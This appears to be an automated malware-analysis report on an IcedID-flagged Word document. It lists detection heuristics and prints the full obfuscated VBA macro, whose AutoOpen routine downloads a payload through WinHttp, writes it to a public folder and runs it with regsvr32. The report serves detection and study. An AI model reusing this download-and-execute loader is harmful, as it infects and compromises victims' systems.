Verdict: MALICIOUS
Risk Score: 290
Heuristics: 7
- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings). Document contains a VBA project; VBA macros present.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `hdPjR(jLAxv + "." + "shell").exec (KoUmF)`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set qKlgT = VBA.CreateObject(hEQqM + "" + zDpSi)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following URLs were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14517 bytes | 2a682f8b90d1100ce230b74924a6b3d9b036818bcd3734ab91d15ebd6fd51ce1 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aSshT"
Sub lmfxl(SiuYE, Optional ByVal usEfX As String = "c:\users\public\buZuK.txt", Optional ByVal zDpSi As String = "systemobject")
' Cursorily lusty
' Spheroid crates merchantable characteristic
' Turns collapse bankruptcies
' Knaves wryly burner ledger butter
' Inquisitorial
' Empathy carapace unclad tachographs
' Angelus relapse
' Inoculates plaintiffs epicurean substitution
' Dissemination cutlets winters dandies
' Commemoration
' Shakeup unarguable
' Tit uncharismatic vienna subventions
' Andes quadrature augurs invasions
' Stonemasons reinitialise octagon
' Annul paratroop therewith
' Struts deduction
' Posteriors ructions
' Sedition species headier heterodoxy evident frivols
' Fanbelt descriptive encroach george
' Labourintensive terminating laddie
' Naturalised allocation bandwagon
' Bye doctorates vainly
' Watery basket
' Aliened geometrical magnificently petticoat refutations headstrong
' Myopically
' Hopeless upstream peachiest escapees
' Constructivism stomping rescue alpine representation
' Craftsmanship pretoria evaluates
Set qKlgT = VBA.CreateObject(hEQqM + "" + zDpSi)
' Slackness hushes advocate
' Deepening endorser stoics unwounded
' Greenhouses mediation earthbound capricious subscribing grandsons
' Clustering titters cupid
' Gels
' Amortise ufo readjustment
' Bloodies
Set eWsph = qKlgT.CreateTextFile(usEfX)
' Bribes gist walkover trenching
' Uppers haziest wretched
' Haematology hosier foreseeability
' Satraps smallmindedness
' Parting sustaining consist agency punctuated
eWsph.WriteLine SiuYE
' Harassed filamentous outbuildings eddy
' Messes banshees
' Suboptimal celestial motorcycles marine
' Creditable recalls walls imperatively fibrillating
eWsph.Close
' Allow sulphonamides unpreparedness buttery
' Encroaches aft deniable
' Multimedia inanity
' Flutters wicked farmsteads purchaser warmer
' Cormorant slate sec eliminated
' Laterally bedsore virtues
' Propagandist maid grimaced schistosomiasis
' Monitored
' Ventriloquy harms homosexually directory
' Engraves lurk begone transgressing realigned
' Strategist detachable cylindrically molester
' Clogs darling lane
' Inborn antique larder
' Compatriots breathing misapprehension
' Fringed portend seizes unluckily
' Hexagons bicentennial reprobate outnumbered
' Juices goofing agreeably infrastructure
' Redisplay
' Bitchy academic
' Dogtag
' Discretely offset
' Rubberised battler
' Waterwheel arterial sharpest
' Punchable rekindled
' Circumcise evaporator jurassic disparity
' Reassembled wonderful arabesque
' Recklessness elaborately middle seaplane carbonated lesbians
' Marmosets holographic
' Stomping petunia
' Saleable spicier stationary oneness unloads lesson eraser
' Disembowel
' Radiantly eligible odiously lien translations
' Baloney adjacency firefight overeats undo
' Universal depose middleclass graves mega informally lameness
' Dramaturgical genuinely entwine brainy
' Bacteriologist
End Sub
' Scifi count cataracts anticipation frailer
' Encroaches
' Socalled
' Everincreasing strived
' Synthesising
' Noises careful strutter outdoors
Sub AutoOpen()
' Thieving atlantic underling characteristic stateliest rands slushy
' Friars sowing photovoltaic fowl
' Extinguishing sparingly
' Birthrate
' Chiropody humbles
' Schematic lilies downstage castigating
' Metropolises waterbeds labile
' Actively fences bitts
' Chateau
' Ferrying lunging industriously
' But comb impels entree
' Remainders clearsighted
' Scent assessors
' Deflection airiest
' Normalised anagrammatic trilogies formic
' Grandee boyfriend bivouacs
' Staunching childbearing
' Sidesteps
' Uvular benefice nail notification
' Jerseys diesel gird invalidity
' Ethyl
' Explanations republished
' Worsened postponing
' Conquests deadlocks
Dim TFGGE As New DOAtS
' Letterheads sonorously
' Rockier subsidy sealed splice tortuous
' Oust exponent honeydew canyons steepened
' Consultant nasal ventral excavate
' Martyrs rustles
zaQjn = ""
' Deaden patriarchal alarmist
' Diluting misquoting torpid
' Usually fathom
' Nett vary pretension
' Vibrant mathematical unquestioningly
' Inertia promulgating inveterate fillers misjudgment
' Resounding intrigued topped
' Snort imaginative discriminators jerkins wanly
' Directives unpardonable converted smoulders
' Adjoining barbiturates sweater handcuff piglets lavishing missives
' Dyers placer
SiuYE = TFGGE.EHwho(CgeBe)
' Woebegone brooding apparitions goodnaturedly
' Rarefactions calibrating discriminator
' Velour mire retorts organisationally
' Defiles climatological motorists objects retracted
' Sacrificing rustled
lmfxl gylfm(SiuYE)
' Charters expectoration piecemeal amok
' Cohered retitled uprightly
' Monomeric troubadours rehashed orifice stenographers
' Slewing genotypes monarchic
' Equivocating converter braindamaged dublin kisses
' Betrayal lowkey
' Sauna sandpiper
' Ophthalmic rasping
' Depleted
' Operation shear athlete
' Chauvinist blackhead cannonball vigorously
EUHhd GuEHk(0) + "vr32 c:\users\public\buZuK.txt", "wscript"
End Sub
Function cfasA(LWUzH, ZUFLy)
' Brazil blasphemy
' Exponentiation daytime gleam ovaries silted
' Wreaths amortise purple
' Honeymoon ellipse
' Cocoons
' Ignorant sclerosis recluses sequencing
' Minds shone stalked sidereal
cfasA = Split(LWUzH, ZUFLy)
End Function
Attribute VB_Name = "QkFVe"
' Attraction hated motorcycling apocalypse hillman
' Diversifies trunnions nappies
' Polluting certifiably
' Pelvises
' Cubing screamingly decimating
Function gylfm(nLsWZ)
' Unbiassed lawbreakers
' Concretely intoxication gravity blacked
' Onto memento
' Corresponds loyal diversifying inferentially
gylfm = StrConv(nLsWZ, vbUnicode)
' Scarce dramatise inspires
' Overlapping sympathised rationally bayonets receptions
' Cling unprocessed timid
' Slicings vulgarly
' Comments bumblers jackbooted dodgems
End Function
' Clamorously plagiarism
' Learn barred demonic
' Dustbin fawning unconsidered kickback polity
' Dress trowel dismemberment mopped
' Electability aint resourced jackass attenuates
' Frailer
' Songsters
Function VTHMP()
' Mackerel liner blabber crayoned rallied
' Contortion colonists ingeniously debentures
' Chemicals beatup ostentation scarp arbor
' Severally
' Blaster sublayer clogs repositioning
' Louse briskness incident
' Goatees quits crashes
' Jungle reactants catguts
' Flogs
' Mildest
' Dispatch persists appraised prisoner
' Iridium alarmed
' Influx gnaw antiparticles venison infinity
' Dangerousness notepad scarab not notations
With ActiveDocument.shapes(1)
VTHMP = .AlternativeText
End With
End Function
' Hierarchic swoop
' Commissariat tiresome responsibly even pie
' Wallow gorgons britain
' Herring transiently
' Humorously scripture incomprehension revivifying
Function GuEHk(DkuSo)
' Crocheted grainiest idiosyncrasies cloven
' Skirl libertarians
' Idealisation blackball accepting microphones portended tower
' Wildeyed
' Hiking analytical
' Disillusioning trump
' Revivalism noting luminal
' Combatant drought vane
' Iconoclasm eerily underwrite hutches
' Sequestrated excruciatingly
usAiX = cfasA(VTHMP(), "~~~")
TOhyH = usAiX(DkuSo)
GuEHk = TOhyH
End Function
Attribute VB_Name = "DOAtS"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function ubKrQ(Beqea)
' Skippering passage euphonium
' Startled offcuts metallurgy exasperate
' Essentialist slanderer craws
' Airtime decanted detachment bulky
' Condensation denture veranda
' Heath wiggled celebrate broadest
' Blasted battle obsolescent untempered softens
' Reach copiers weaving alleviate
' Amortise some outings fraud squiggle
' Microphones umlauts intoxicant
' Flakiest supervising
' Hobgoblins vision
' Curare procreative opacity devaluation
' Primordial
' Searchlight enslaved
' Wholesaler technophiles consensus propagandists
' Localise
AWOuI = Beqea
xzkPc = Len(AWOuI)
For YOUrc = 0 To xzkPc - 1
' Inquirer glowers mortgagees affably
' Psoriasis tartly
' Disperser
' Chirp comparatives sins idealising instantaneously
' Trot flaxen
' Dears leaching maddest
' Friendliest green uncut babbler untwist despatches
' Cuneiform excelsior intercede
' Imams next uncontested prat tapas
' Pedlar
' Extravaganzas dimples intermarriages spiking
' Strawberry regressions autonomously
' Lebanon unshielded joined impede
' Marring groovy gentleness formic collectivisation peacetime
' Fleecing reinterpret harmonic subtend
VDMJg = VDMJg & Mid(AWOuI, (xzkPc - YOUrc), 1)
Next YOUrc
' Rejoice sentient jackdaws
' Thinnish melody overlaying husbands
' Boneless paternalistic beggarly solar deletion contrived
' Quests reconfiguration inconvenienced
' Unequivocally repined loose morosely parvenu
' Fenland ego
' Kilobits emolument invariant appendage
ubKrQ = VDMJg
End Function
' Warms junks serotonin counterparts
' Shovels reconstructs
' Choke interrelated dermal
' Risotto ambushing etymologies classificatory biorhythm orthogonal
' Canoed tuesday gritted arbitrage bonded arbitrageur
Function EHwho(vZvkV)
' Epic snuffbox zips twister baroque translucent
' Boxy impotently doting
' Reactors auxiliary
' Wallets
' Followed stutters chasers workstations
' Interned foggiest shaved
' Arbitral crasher dispatches cigarette holdup
Dim vYyTT As Object
' Prosaist avoiding amputated
' Requisitions flagships
' Today numeral image pulse unrolling
' Bloodthirstiest yukon
' Informing
' Scam hardcore bustier stepsister
' Metro amphetamine assignment
' Geographic shallows contra influencing steeplechaser
' Purchase rain install
' Sunroof unscrew spasmodic
' Detailing inflame contuse griffins
Set vYyTT = CreateObject(ubKrQ(vZvkV) + "." + ubKrQ(vZvkV) + "Request.5.1")
' Restate choreographer skips distinguish pimp
' Mumbler resolutely
' Turrets rhinestone
' Admix equivocations inelegant yours draining pirated
' Wrinkles cistern
' Forecast
' Genealogies equations blackouts ventriloquy convulse smoked
' Coal configurations
' Inaccurate wellequipped
' Unselfishness treats unscrambling
' Swapped deferred
' Mufti judicature infestations jumpstarting quantity
' Corollaries chunnel reformer fruiting
' France blobs undercooked
' Physiognomy recurrent isogram thriftiest
' Sprayed installers cannibalising
' Architect
' Heathen bakes obtuseness nutation danube
' Pitons anthrax
' Vigour
' Inverted differentiation orgy escalator
' Catchers synchrotron
qQUlW = GuEHk(1)
' Onlooker footballer wasteland catacomb migrate
' Vitamins pampas hurt
' Monday refilling orthographic writings
' Irregularly imperturbable died wretch koalas blackboards
' Blaspheme memorandums
' Displace hyperbolic
vYyTT.Open "GET", ubKrQ(qQUlW), False
' Rand starlings condiment demonstrated
' Mistaken motile gentleman looter
' Godfather bridges
' Green bart heiresses consultations sibilant corrective
' Unwitting wettable queerly positions neutrino
vYyTT.Send
' Keenly dismounts
' Occupy fractious antral vasectomy
' Ovens defrauds inconstant
' Parasitology optimises
' Hotting huddles
' Dastardly lander statuettes seethe reinitialise dallying
' Bang
EHwho = vYyTT.responsebody
End Function
Attribute VB_Name = "aylsv"
Public Const CgeBe As String = "ptthniw"
Public Const hEQqM As String = "scripting.file"
Function hdPjR(mmNLs)
Set hdPjR = CreateObject(mmNLs)
End Function
Sub EUHhd(KoUmF, jLAxv)
' Dropouts formic
' Railroad bonus canons numskull
' Hungry
' Furnaces topically quaffing rigidity
' Mastodon boxers
' Refrains unifiable
' Extender revue collapse listlessness colitis
' Mispronunciation judges made
' Existentialistic tribesman
' Gleefully circumcision slurps wrench
' Advisory mobilities rescheduled unwelcome polytheism
' Polymeric hunting abodes
' Elongate sterilisations unilateralism monasticism egoism
' Looter tempers
' Strolls gondola
' Gastronomic substratum resubmit
' Collections segregation lushest cogitations
' Nurse transmogrifies geeks
' Ascribe coaxial outspread haemorrhoids minors
' Amputations vanes
' Paroxysm ontario worshipping notification emolument surreptitious culture
hdPjR(jLAxv + "." + "shell").exec (KoUmF)
' Beetroot depositories riveter facers indecisiveness
' Thunders social
' Pagan intimated evidential revisiting
' Devotee yak unceasingly
' Putty taxidermist
' Appliance contemplative snorting legislature viewed perseveres
' Debate cumlaude
' Amidships relinquishing
' Thorny billowed
' Bogging folks valet abbots chainsmoked
' Inspirational transcriber thoroughbreds wealthiest
' Dresser regain sagging ludicrously pathetic
' Timing faraday wronged minty
' Dissipates illinformed fraudster deluded
' Muff adjure
' Expropriated indispensability crease
' Aestheticsy lowers reverberated pathos
' Shut occupants scorned bladed
' Forbearance transactional testify crotchety satisfactions
' Frameworks retests funded prudently
' Spigot deftness wrangled brakes
' Encrypt idiosyncrasies
' Caries pervaded scrubs gases roved
' Languorously
' Summoning colourless
' Crossword
' Erudite openmindedness tunes predominating
' Disappears addressees demise omnipresence
' Biographically xenon lunched beginner prettier buyers lingers
' Demolitions iranian coastal noggin
' Neatly
' Quainter knob saleswoman broths microwaveable
' Resea
' Antidote varied leisure collided delectation
' Lathers outpointing
' Romanticism lobby contouring journalling
' Laptops defects musicals
' Unannounced lumbago funnies
' Guttering reseller
' Shipwright spinet
' Injoke
' Frailties grammarians truncheons defensively purposeless
' Disclaiming avalanching amniotic
' Black reindeer kilobytes known
' Tints carrot freshmen symbiotically
' Indoor actives innate
' Manically lurker camera snare hunkers adlibs
' Centralisation prickliest strengths
' Heliography differed fountains
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 50176 bytes | 82b09531b3578b587e0c3d263d70f131c34900b2f8f75a839d39d9f2241a8f10 |
Detection
- ClamAV: Doc.Macro.ICEID1020-9781212-0
- Obfuscation or payload: unlikely